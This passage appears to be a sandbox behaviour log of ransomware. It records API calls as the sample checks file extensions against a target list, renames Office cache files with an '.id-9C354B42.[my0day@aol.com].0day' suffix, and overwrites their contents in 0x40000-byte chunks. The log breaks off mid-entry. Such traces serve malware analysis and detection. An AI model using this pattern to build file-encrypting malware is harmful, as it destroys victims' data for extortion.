SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x93f3f4, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.224] WriteFile (in: hFile=0x1b0, lpBuffer=0x3f6a0a0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f6a0a0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.228] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f6a0a0 | out: hHeap=0x5f0000) returned 1 [0035.228] CloseHandle (hObject=0x1b0) returned 1 [0037.709] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0037.710] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.710] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.710] lstrlenW (lpString=".doc") returned 4 [0037.710] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0037.710] lstrlenW (lpString=".docx") returned 5 [0037.710] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0037.710] lstrlenW (lpString=".pdf") returned 4 [0037.710] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0037.710] lstrlenW (lpString=".xls") returned 4 [0037.710] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0037.710] lstrlenW (lpString=".xlsx") returned 5 [0037.710] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0037.710] lstrlenW (lpString=".ppt") returned 4 [0037.710] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0037.710] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.710] lstrlenW (lpString=".zip") returned 4 [0037.710] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0037.710] lstrlenW (lpString=".rar") returned 4 [0037.710] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0037.710] lstrlenW (lpString=".bz2") returned 4 [0037.710] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0037.710] lstrlenW (lpString=".7z") returned 3 [0037.710] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0037.710] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.710] lstrlenW (lpString=".dbf") returned 4 [0037.710] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0037.710] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.710] lstrlenW (lpString=".1cd") returned 4 [0037.710] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0037.710] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.710] lstrlenW (lpString=".jpg") returned 4 [0037.710] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0037.710] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.711] lstrlenW (lpString=".doc") returned 4 [0037.711] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0037.711] lstrlenW (lpString=".docx") returned 5 [0037.711] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0037.711] lstrlenW (lpString=".pdf") returned 4 [0037.711] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0037.711] lstrlenW (lpString=".xls") returned 4 [0037.711] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0037.711] lstrlenW (lpString=".xlsx") returned 5 [0037.711] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0037.711] lstrlenW (lpString=".ppt") returned 4 [0037.711] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0037.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.711] lstrlenW (lpString=".zip") returned 4 [0037.711] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0037.711] lstrlenW (lpString=".rar") returned 4 [0037.711] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0037.711] lstrlenW (lpString=".bz2") returned 4 [0037.711] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0037.711] lstrlenW (lpString=".7z") returned 3 [0037.711] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0037.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.711] lstrlenW (lpString=".dbf") returned 4 [0037.711] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0037.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.711] lstrlenW (lpString=".1cd") returned 4 [0037.711] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0037.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.711] lstrlenW (lpString=".jpg") returned 4 [0037.711] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0037.712] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0037.712] lstrlenW (lpString="WordMUI.msi") returned 11 [0037.712] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0037.712] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=2522624) returned 1 [0037.712] CloseHandle (hObject=0x1b0) returned 1 [0037.712] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi")) returned 0x2020 [0037.712] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.712] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0037.713] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0037.713] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0037.713] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.713] ReadFile (in: hFile=0x1b0, lpBuffer=0x3a60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3a60058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.945] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xcd4aa, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.945] ReadFile (in: hFile=0x1b0, lpBuffer=0x3aa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3aa0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.963] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0037.963] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x227e00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.963] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ae0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.022] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.022] WriteFile (in: hFile=0x1b0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0038.384] SetEndOfFile (hFile=0x1b0) returned 1 [0038.385] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f8a0a8 [0038.385] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.385] WriteFile (in: hFile=0x1b0, lpBuffer=0x3f8a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f8a0a8*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.387] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xcd4aa, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.387] WriteFile (in: hFile=0x1b0, lpBuffer=0x3f8a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f8a0a8*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.393] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x227e00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.393] WriteFile (in: hFile=0x1b0, lpBuffer=0x3f8a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f8a0a8*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.396] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f8a0a8 | out: hHeap=0x5f0000) returned 1 [0038.396] CloseHandle (hObject=0x1b0) returned 1 [0039.007] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0039.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0039.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0039.007] lstrlenW (lpString=".doc") returned 4 [0039.007] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0039.007] lstrlenW (lpString=".docx") returned 5 [0039.007] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0039.007] lstrlenW (lpString=".pdf") returned 4 [0039.007] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0039.007] lstrlenW (lpString=".xls") returned 4 [0039.007] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0039.007] lstrlenW (lpString=".xlsx") returned 5 [0039.007] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0039.007] lstrlenW (lpString=".ppt") returned 4 [0039.007] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0039.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0039.007] lstrlenW (lpString=".zip") returned 4 [0039.007] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0039.007] lstrlenW (lpString=".rar") returned 4 [0039.007] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0039.007] lstrlenW (lpString=".bz2") returned 4 [0039.007] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0039.008] lstrlenW (lpString=".7z") returned 3 [0039.008] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0039.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0039.008] lstrlenW (lpString=".dbf") returned 4 [0039.008] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0039.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0039.008] lstrlenW (lpString=".1cd") returned 4 [0039.008] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0039.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0039.008] lstrlenW (lpString=".jpg") returned 4 [0039.008] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0039.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0039.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0039.008] lstrlenW (lpString=".doc") returned 4 [0039.008] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0039.008] lstrlenW (lpString=".docx") returned 5 [0039.008] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0039.008] lstrlenW (lpString=".pdf") returned 4 [0039.008] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0039.008] lstrlenW (lpString=".xls") returned 4 [0039.008] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0039.008] lstrlenW (lpString=".xlsx") returned 5 [0039.008] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0039.008] lstrlenW (lpString=".ppt") returned 4 [0039.008] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0039.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0039.008] lstrlenW (lpString=".zip") returned 4 [0039.008] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0039.008] lstrlenW (lpString=".rar") returned 4 [0039.008] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0039.008] lstrlenW (lpString=".bz2") returned 4 [0039.008] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0039.008] lstrlenW (lpString=".7z") returned 3 [0039.008] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0039.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0039.009] lstrlenW (lpString=".dbf") returned 4 [0039.009] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0039.009] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0039.009] lstrlenW (lpString=".1cd") returned 4 [0039.009] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0039.009] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0039.009] lstrlenW (lpString=".jpg") returned 4 [0039.009] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0039.009] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0039.009] lstrlenW (lpString="Proof.cab") returned 9 [0039.009] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0039.139] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=13642474) returned 1 [0039.139] CloseHandle (hObject=0x1a0) returned 1 [0039.139] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab")) returned 0x2020 [0039.139] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0039.140] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0039.140] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0039.140] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0039.140] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.140] ReadFile (in: hFile=0x1a0, lpBuffer=0x3a60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3a60058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.195] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x4563a3, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.195] ReadFile (in: hFile=0x1a0, lpBuffer=0x3aa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3aa0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.200] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0039.200] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xcc2aea, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.200] ReadFile (in: hFile=0x1a0, lpBuffer=0x3ae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ae0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.217] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.217] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0039.229] SetEndOfFile (hFile=0x1a0) returned 1 [0039.229] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3fca0b0 [0039.402] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.402] WriteFile (in: hFile=0x1a0, lpBuffer=0x3fca0b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.403] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x4563a3, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.403] WriteFile (in: hFile=0x1a0, lpBuffer=0x3fca0b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.403] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xcc2aea, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.403] WriteFile (in: hFile=0x1a0, lpBuffer=0x3fca0b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.405] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fca0b0 | out: hHeap=0x5f0000) returned 1 [0039.405] CloseHandle (hObject=0x1a0) returned 1 [0041.701] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0041.701] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.701] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.701] lstrlenW (lpString=".doc") returned 4 [0041.701] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0041.701] lstrlenW (lpString=".docx") returned 5 [0041.701] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0041.701] lstrlenW (lpString=".pdf") returned 4 [0041.701] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0041.701] lstrlenW (lpString=".xls") returned 4 [0041.701] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0041.701] lstrlenW (lpString=".xlsx") returned 5 [0041.702] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0041.702] lstrlenW (lpString=".ppt") returned 4 [0041.702] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0041.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.702] lstrlenW (lpString=".zip") returned 4 [0041.702] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0041.702] lstrlenW (lpString=".rar") returned 4 [0041.702] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0041.702] lstrlenW (lpString=".bz2") returned 4 [0041.702] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0041.702] lstrlenW (lpString=".7z") returned 3 [0041.702] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0041.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.702] lstrlenW (lpString=".dbf") returned 4 [0041.702] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0041.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.702] lstrlenW (lpString=".1cd") returned 4 [0041.702] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0041.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.702] lstrlenW (lpString=".jpg") returned 4 [0041.702] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0041.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.702] lstrlenW (lpString=".doc") returned 4 [0041.702] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0041.702] lstrlenW (lpString=".docx") returned 5 [0041.702] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0041.702] lstrlenW (lpString=".pdf") returned 4 [0041.702] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0041.702] lstrlenW (lpString=".xls") returned 4 [0041.702] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0041.702] lstrlenW (lpString=".xlsx") returned 5 [0041.702] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0041.702] lstrlenW (lpString=".ppt") returned 4 [0041.703] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0041.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.703] lstrlenW (lpString=".zip") returned 4 [0041.703] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0041.703] lstrlenW (lpString=".rar") returned 4 [0041.703] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0041.703] lstrlenW (lpString=".bz2") returned 4 [0041.703] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0041.703] lstrlenW (lpString=".7z") returned 3 [0041.703] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0041.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.703] lstrlenW (lpString=".dbf") returned 